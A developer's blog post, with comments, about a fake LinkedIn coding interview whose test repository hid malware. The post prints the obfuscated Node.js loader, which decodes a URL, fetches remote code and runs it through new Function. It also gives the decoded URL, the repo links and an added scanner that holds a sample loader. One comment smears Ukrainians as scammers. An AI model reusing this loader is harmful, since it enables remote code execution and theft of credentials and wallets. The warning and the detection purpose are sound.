How I Almost Got Hacked By A 'Job Interview'


Hey there!

I'm an electronics engineer who's dabbled in a bit of everything, including full-stack development and web3 technologies. I love building cool stuff and am always looking to connect with other like-minded professionals. When I'm not tinkering with new projects, you can find me scouring the internet for the latest and greatest in tech.

I was 30 seconds away from running malware on my machine.

The attack vector? A fake coding interview from a "legitimate" blockchain company.

Here's how a sophisticated scam operation almost got me, and why every developer needs to read this.

The Setup

Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works.

The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure."

I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought.

This looked legit. So I said yes to the call.

The Hook

Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough.

The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one.

Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first.

Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.

I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work.

Then I had one of those paranoid developer moments.

The Save

Before hitting npm start, I threw this prompt at my Cursor AI agent:

"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence.

Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast.

I ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.
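The loader in server/controllers/userController.js has two tells that a static check can find without running anything: a numeric array that decodes to a URL, and a string-to-code sink such as new Function. The Node.js sketch below is an added example, not code from the original post; scanSource, scanTree and the example.invalid sample are names and inputs constructed for illustration.

```javascript
// Added example: static triage only. It reads source text and never runs or fetches it.
const NUM_ARRAY = /\[\s*((?:\d{1,3}\s*,\s*){7,}\d{1,3})\s*,?\s*\]/g; // 8+ small integers
const EXEC_SINK = /\bnew\s+Function\s*\(|\beval\s*\(|\bvm\.runIn\w*\s*\(/; // string -> code

// Decode every numeric array literal that turns out to be printable ASCII.
function decodeByteArrays(source) {
  const decoded = [];
  for (const m of source.matchAll(NUM_ARRAY)) {
    const bytes = m[1].split(",").map((n) => Number(n.trim()));
    if (bytes.some((b) => b > 255)) continue;
    const text = Buffer.from(bytes).toString("latin1");
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Classify one file's text: a hidden URL plus a dynamic-exec sink is the loader shape.
function scanSource(source) {
  const hiddenUrls = decodeByteArrays(source).filter((s) => /^https?:\/\//i.test(s));
  const execSink = EXEC_SINK.test(source);
  let verdict = "clean";
  if (hiddenUrls.length || execSink) verdict = "review";
  if (hiddenUrls.length && execSink) verdict = "remote-loader";
  return { verdict, hiddenUrls, execSink };
}

// Walk a checkout, node_modules included, and return every file that is not clean.
function scanTree(dir, findings = []) {
  const fs = require("fs"), path = require("path"); // loaded here so scanSource works on plain strings
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) scanTree(full, findings);
    else if (/\.[cm]?js$/.test(entry.name)) {
      const result = scanSource(fs.readFileSync(full, "utf8"));
      if (result.verdict !== "clean") findings.push({ file: full, ...result });
    }
  }
  return findings;
}

// Constructed sample with the same shape as the snippet above; the URL is a placeholder.
const SAMPLE_URL = "https://example.invalid/payload";
const SAMPLE = `(async () => {
  const byteArray = [${[...Buffer.from(SAMPLE_URL)].join(", ")}];
  axios.get(new TextDecoder("utf-8").decode(new Uint8Array(byteArray)))
    .then((r) => { new Function("require", r.data.model)(require); });
})();`;
const BENIGN = "const days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31];";
console.log(scanSource(SAMPLE), scanSource(BENIGN));
```

Call scanTree(".") from the repo root before any npm install or npm start; it walks node_modules as well. It only recognises this one encoding, so a clean result is not a reason to skip the sandbox.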

The Operation

This wasn't some amateur hour scam. This was sophisticated:

The LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting."

The Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks.

The Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling.

The Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed.

The Psychology

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff.

The Lesson

One simple AI prompt saved me from disaster.

Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code.

The scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing.

And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything.

The Scale

If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now?

Perfect Targeting: Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data.

Professional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.

Technical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution.

One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users.

The Bottom Line

If you're a developer getting LinkedIn job opportunities:

  1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.

  2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.

  3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.

  4. Trust your gut. If someone's rushing you to execute code, that's a red flag.

This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing.

The next time someone sends you a "coding challenge," remember this story.

Your crypto wallet will thank you.


If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice.

the LinkedIn profiles

Messages

Bitbucket

https://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though.

Comments (11)

B

I mean the logo of "BE BRAVE LIKE UKRAINE" and f*cking ---->MYKOLA<--- Yanchii should ring all the alarm bells you needed, it's well known and documented in news articles how Ukranda is running all kinds of massive scam operation to fund their futile war and bankrupt government. Don't believe me? just do a search on google or yandex to get both sides of the coin. Adi would heavily question even the "Founder" and "recruiter" in the comments.

M

That is scary.

Interesting that you used AI to save yourself. I would have had 2nd thoughts at the AI generated estate agent!

Also: who has production credentials on their developer machine?? Then you are asking for it.

Stay safe out there.

chelmix · 5mo ago

Hi David, thank you for sharing your story, it made me realize I was definitely not paranoid enough... so far 😅

Do you know if the malware involved was platform-agnostic? For instance, could being on Linux vs Windows save the potential victim?

zhao alex · 5mo ago

Hi David, thanks for sharing. I've run the script, luckily the computer I ran the code on did not hold any important information. I'll reinstall the OS. And thanks again for sharing the valuable experience.

D

Hi David, thanks for your posting. Can you share that malware JS file with me? I'd like to see that honestly.

Billy Shin · 6mo ago

I got the same treatment from a different recruiter and different company! This time they MODIFIED an npm library to hit a URL (api.mocki[.]io/v2/chopmguh/tracks/errors/190529. It's safe as LONG as you don't run the downloaded javascript, it will appear as text) and run this obfuscated code!!!

The company is another Crypto company (www.linkedin.[.]com/company/blockchain-121/) from a recruiter (www.linkedin[.]com/in/elena-blahodir/) which I have already reported to LinkedIn.

They also sent me to a bitbucket repo. (bitbucket[.]org/screening_assessment/mike_dex_challenge_ret/src/main/) (Just realized this thing has 3 forks~~ And the watchers of each fork are questionable. Anyway another lead to chase down. )

And all the emails... they come from .outlook.com. That should have been a big clue.

I unfortunately ran the code locally (facepalm), and I am trying to track down if anything malicious is happening on my machine.

I have another recruiter hitting me up from a very odd company which is following the same pattern, and I suspect it is another one of these.

A

Hi David 👋

I'm a Lead Recruiter here at Symfa.

Thanks so much for sharing your story 🙌.

Sadly, these kinds of scams, where people pretend to be from legitimate companies, are happening more and more. We've reported these fake profiles pretending to be our employees multiple times, but LinkedIn hasn't done anything to block them.

Here are a few things to keep in mind:

  • Symfa and our teams had nothing to do with what happened.
  • Our job postings and interviews only go through official channels.
  • We never give out assignments to complete before a technical interview!

To help protect yourself from these schemes:

  • Always double-check the email address – Symfa emails always end in @symfa.com.
  • Watch out for how the interview is structured: our recruiters and tech folks always turn on their cameras and explain the hiring process step-by-step.
  • If anything seems fishy, reach out to Symfa directly at talent@symfa.com or through our website.

We're doing our best to catch and stop these scammers as fast as possible.

I would appreciate it if you could provide me with more detailed information. Could you also let me know how I can find you on LinkedIn?

S

Hi David, I'm Sergey Galuza – Symfa's founder. Thanks for flagging this! These scammers have nothing to do with Symfa – they just exploited LinkedIn's default setting that lets anyone add any company to their profile. We've now disabled that and added verification. If you have any additional info, I'd be happy if you share in DM so we can investigate this further. Appreciate you looking out for the dev community!

N

I used to work at Symfa. Yes, it wasn't the best experience, but even for them, scamming is beyond what I can imagine and believe. What I think happened to you is that a corrupt employee was involved. I can't find that Mykola on LinkedIn right now (as of 2025.10.16). I suppose he either worked there and was fired after the incident, or he never existed: just a fake account connected to the company. In any case, they covered the whole thing up. Obviously, they need to check who they’re connected to in their profile. It just means we need to be suspicious of people. Since the Mitnick era, not much has changed.

G

It seems like they were quite prepared. I'd say the screenshots, especially the LinkedIn profile and messages look pretty convincing. Usually, scammers are sloppy, they don't use Calendly, and you can often spot things like odd punctuation in their comments. But these guys seem professional.

One red flag for me is that I never do coding challenges before having at least one face-to-face video call. That filters out a lot of scammers.
